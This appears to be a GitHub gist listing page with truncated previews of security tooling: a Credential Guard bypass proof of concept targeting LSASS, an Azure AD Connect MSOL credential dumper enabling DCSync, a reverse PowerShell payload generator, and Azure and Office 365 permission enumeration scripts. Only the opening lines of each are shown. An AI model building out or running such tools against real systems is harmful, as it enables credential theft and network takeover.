Grem25
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Find dangerous API permissions as a user | |
| $AzureTenantID = '<Your tenant ID>' | |
| $AccountName = '<Username>@<Domain.com>' | |
| $Password = ConvertTo-SecureString '<Your password>' -AsPlainText -Force | |
| $Credential = New-Object System.Management.Automation.PSCredential($AccountName, $Password) | |
| Connect-AzAccount -Credential $Credential -TenantID $AzureTenantID | |
| function Get-AzureGraphToken | |
| { |
N4kedTurtle
/ CredGuard_PoC
Created
August 25, 2020 14:17
PoC for enabling wdigest to bypass credential guard
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #define _CRT_SECURE_NO_WARNINGS | |
| #include <Windows.h> | |
| #include <Psapi.h> | |
| #include <TlHelp32.h> | |
| #include <iostream> | |
| DWORD GetLsassPid() { | |
| PROCESSENTRY32 entry; | |
| entry.dwSize = sizeof(PROCESSENTRY32); |
xpn
/ azuread_decrypt_msol_v2.ps1
Last active
July 30, 2025 13:07
Updated method of dumping the MSOL service account (which allows a DCSync) used by Azure AD Connect Sync
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Write-Host "AD Connect Sync Credential Extract v2 (@_xpn_)" | |
| Write-Host "`t[ Updated to support new cryptokey storage method ]`n" | |
| $client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=(localdb)\.\ADSync2019;Initial Catalog=ADSync" | |
| try { | |
| $client.Open() | |
| } catch { | |
| Write-Host "[!] Could not connect to localdb..." | |
| return |
tothi
/ mkpsrevshell.py
Created
February 17, 2019 00:05
reverse PowerShell cmdline payload generator (base64 encoded)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| # | |
| # generate reverse powershell cmdline with base64 encoded args | |
| # | |
| import sys | |
| import base64 | |
| def help(): | |
| print("USAGE: %s IP PORT" % sys.argv[0]) |
ciphertxt
/ Get-MsolRolesAndMembers.ps1
Created
May 10, 2016 12:43
Retrieves a list of current roles and the associated role members in an Office 365 tenant.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Import-Module MSOline -EA 0 | |
| Connect-MsolService -Credential (Get-Credential) | |
| $admins=@() | |
| $roles = Get-MsolRole | |
| foreach ($role in $roles) { | |
| $roleUsers = Get-MsolRoleMember -RoleObjectId $role.ObjectId |